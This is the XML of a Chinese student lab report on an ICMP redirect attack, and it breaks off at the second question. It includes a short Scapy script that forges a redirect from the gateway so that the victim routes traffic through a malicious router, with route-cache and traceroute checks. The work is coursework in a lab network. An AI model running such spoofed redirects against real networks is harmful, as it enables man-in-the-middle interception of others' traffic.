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78284D" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC" w:rsidP="00C228CC">
      <w:pPr>
        <w:spacing w:after="139" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="46"/>
        </w:rPr>
        <w:t>ICMP Redirect Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAED8DC" w14:textId="1CAB978E" w:rsidR="00773F28" w:rsidRDefault="00C228CC" w:rsidP="00C228CC">
      <w:pPr>
        <w:spacing w:after="182" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="KaiTi" w:eastAsia="KaiTi" w:hAnsi="KaiTi" w:cs="KaiTi"/>
        </w:rPr>
        <w:t xml:space="preserve">57118114 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="KaiTi" w:eastAsia="KaiTi" w:hAnsi="KaiTi" w:cs="KaiTi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>蔡欣明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C21CF4" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Task 1: Launching ICMP RedirectAttack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DD9CD9" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:line="349" w:lineRule="auto"/>
        <w:ind w:left="465" w:hanging="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>代码实现</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ip route </w:t>
      </w:r>
      <w:r>
        <w:t>命令查看被攻击主机的路由表：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD7135C" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="68" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="-545" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13C0B69A" wp14:editId="6329F95A">
            <wp:extent cx="5708904" cy="765048"/>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
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5708904" cy="765048"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0EAB3B" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="-15" w:right="142" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>可以发现对于局域网</w:t>
      </w:r>
      <w:r>
        <w:t>192.168.60.0/24</w:t>
      </w:r>
      <w:r>
        <w:t>，网关为</w:t>
      </w:r>
      <w:r>
        <w:t>10.9.0.11</w:t>
      </w:r>
      <w:r>
        <w:t>，该网关地址在后面的代码中会用到。攻击代码如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8179" w:type="dxa"/>
        <w:tblInd w:w="43" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="149" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8179"/>
      </w:tblGrid>
      <w:tr w:rsidR="00773F28" w14:paraId="11DD2021" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="2962"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8179" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10CBC51D" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
            <w:pPr>
              <w:spacing w:after="1" w:line="313" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="4411" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>#!/usr/bin/python3 from scapy.all import* ip = IP(src = "10.9.0.11",dst = "10.9.0.5") icmp = ICMP(type=5, code=1) icmp.gw = "10.9.0.111"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7455925E" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="3924" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t># The enclosed IP packet should be the one that # triggers the redirect message. ip2 = IP(src = "10.9.0.5", dst = "192.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>168.60.5") send(ip/icmp/ip2/ICMP());</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B264EC1" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="183"/>
        <w:ind w:left="-15" w:right="4" w:firstLine="470"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>这里设置</w:t>
      </w:r>
      <w:r>
        <w:t>icmp</w:t>
      </w:r>
      <w:r>
        <w:t>重定向数据包的源</w:t>
      </w:r>
      <w:r>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:t>地址（</w:t>
      </w:r>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>值）为局域网的网关即上面我们看到的</w:t>
      </w:r>
      <w:r>
        <w:t>10.9.0.11</w:t>
      </w:r>
      <w:r>
        <w:t>，重定向数据包要发回被攻击者，所以目的地址为</w:t>
      </w:r>
      <w:r>
        <w:t>10.9.0.5.</w:t>
      </w:r>
      <w:r>
        <w:t>指定新的网关（即代码中的</w:t>
      </w:r>
      <w:r>
        <w:t>icmp.gw</w:t>
      </w:r>
      <w:r>
        <w:t>）为</w:t>
      </w:r>
      <w:r>
        <w:t>10.9.0.111,</w:t>
      </w:r>
      <w:r>
        <w:t>即恶意路由器地址。要实现</w:t>
      </w:r>
      <w:r>
        <w:t>ICMP</w:t>
      </w:r>
      <w:r>
        <w:t>的重定向，所以</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>应该为</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>Redirect(changeroute)</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> code</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>hostunreachable</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>ip2</w:t>
      </w:r>
      <w:r>
        <w:t>必须与受害者当前发送的数据包目的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ip </w:t>
      </w:r>
      <w:r>
        <w:t>地址和源地址相匹配，所以</w:t>
      </w:r>
      <w:r>
        <w:t>ip2</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>10.9.0.5,dst</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 192.168.60.5</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A827DE" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>进行重定向攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490E3CE6" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="-15" w:right="0" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>在发起攻击之前，在被攻击主机中</w:t>
      </w:r>
      <w:r>
        <w:t>ping 192.168.60.5</w:t>
      </w:r>
      <w:r>
        <w:t>，然后在攻击主机中执行攻击程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424327CF" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="490" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>攻击方和被攻击方输出如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255B0B64" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C4FCF81" wp14:editId="7CD87195">
            <wp:extent cx="4168140" cy="541020"/>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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4168140" cy="541020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D0B0FA" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="168A6CA6" wp14:editId="5776D82C">
            <wp:extent cx="4980432" cy="1475232"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4980432" cy="1475232"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="512242C2" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="490" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>我们可以在攻击执行时用</w:t>
      </w:r>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:r>
        <w:t>捕获我们发送的重定向包：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A67E172" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="155" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="054FEED9" wp14:editId="668AACA8">
            <wp:extent cx="5269992" cy="2036064"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="178" name="Picture 178"/>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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5269992" cy="2036064"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E40AB80" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="490" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>可以看到这里源地址为网关地址，目的地址为被攻击者地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42004C94" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="7"/>
        <w:ind w:left="-15" w:right="4" w:firstLine="470"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>除此之外，还可以看到</w:t>
      </w:r>
      <w:r>
        <w:t>Gateway address</w:t>
      </w:r>
      <w:r>
        <w:t>值为恶意路由器地址</w:t>
      </w:r>
      <w:r>
        <w:t>10.9.0.111</w:t>
      </w:r>
      <w:r>
        <w:t>，使得被攻击者向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 192.168.60.5 </w:t>
      </w:r>
      <w:r>
        <w:t>发送数据包时，它将使用恶意路由器作为其路由器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2086A601" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="490" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>我们可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>ip route show cache</w:t>
      </w:r>
      <w:r>
        <w:t>命令查看攻击后的路由缓存：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689B3ED7" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="37" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="710EA137" wp14:editId="594BA24E">
            <wp:extent cx="4922520" cy="594360"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4922520" cy="594360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C6AD13" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="-15" w:right="0" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>发现发送至</w:t>
      </w:r>
      <w:r>
        <w:t>192.168.60.5</w:t>
      </w:r>
      <w:r>
        <w:t>的数据包的网关已经被重定向为恶意路由器地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEA8C1E" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="-15" w:right="0" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>我们还可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>mtr -n 192.168.60.5</w:t>
      </w:r>
      <w:r>
        <w:t>命令对比攻击前后的路由：攻击前：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770E290C" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="140" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="-7" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="459E76C2" wp14:editId="6B3EC3F2">
            <wp:extent cx="5367528" cy="665988"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="213" name="Picture 213"/>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10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5367528" cy="665988"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75499C81" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>攻击后：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2405F77A" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="188" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61F00217" wp14:editId="4F8D0AD7">
            <wp:extent cx="5269992" cy="810768"/>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11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5269992" cy="810768"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F3CB7B" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="-15" w:right="0" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>可以发现攻击后路由发生变化，数据包首先就会到达恶意路由器，说明重定</w:t>
      </w:r>
      <w:r>
        <w:t>向攻击成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD1DE17" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>问题回答</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3041D8DF" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>问题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1:</w:t>
      </w:r>
      <w:r>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP </w:t>
      </w:r>
      <w:r>
        <w:t>重定向攻击重定向到远程机器吗？也就是说，分配给</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> icmp.gw </w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP</w:t>
      </w:r>
      <w:r>
        <w:t>地址是一台不在本地局域网上的计算机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6929A58C" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="442" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> icmp.gw </w:t>
      </w:r>
      <w:r>
        <w:t>修改为百度</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ip </w:t>
      </w:r>
      <w:r>
        <w:t>地址</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 202.108.22.5</w:t>
      </w:r>
      <w:r>
        <w:t>，其他不变，重新运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC0D116" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="490" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>运行后发现没有产生路由缓存。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6922220A" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="67" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70E5B5D1" wp14:editId="377CF95B">
            <wp:extent cx="4320540" cy="365760"/>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12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4320540" cy="365760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D80CCF2" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="490" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">traceroute </w:t>
      </w:r>
      <w:r>
        <w:t>路由发现前后也没有变化。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31434EA9" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="245" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5076D739" wp14:editId="7A2B8443">
            <wp:extent cx="5268468" cy="454152"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="258" name="Picture 258"/>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13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5268468" cy="454152"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2D6EB3" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="194" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="727E0762" wp14:editId="67EE1CFB">
            <wp:extent cx="5273040" cy="1799844"/>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14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5273040" cy="1799844"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFCC9E8" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="-15" w:right="0" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">wireshark </w:t>
      </w:r>
      <w:r>
        <w:t>查看我们发送的重定向包发现并没有什么问题，但是执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">traceroute </w:t>
      </w:r>
      <w:r>
        <w:t>时还发现了一些超时的数据包。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDA8CF2" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="181" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34DAB60E" wp14:editId="45870E01">
            <wp:extent cx="5269992" cy="213360"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5269992" cy="213360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5DD437" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="295"/>
        <w:ind w:left="370" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>推测由于无法直接到达远程机器，所以重定向失败。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A31395" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>问题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2:</w:t>
      </w:r>
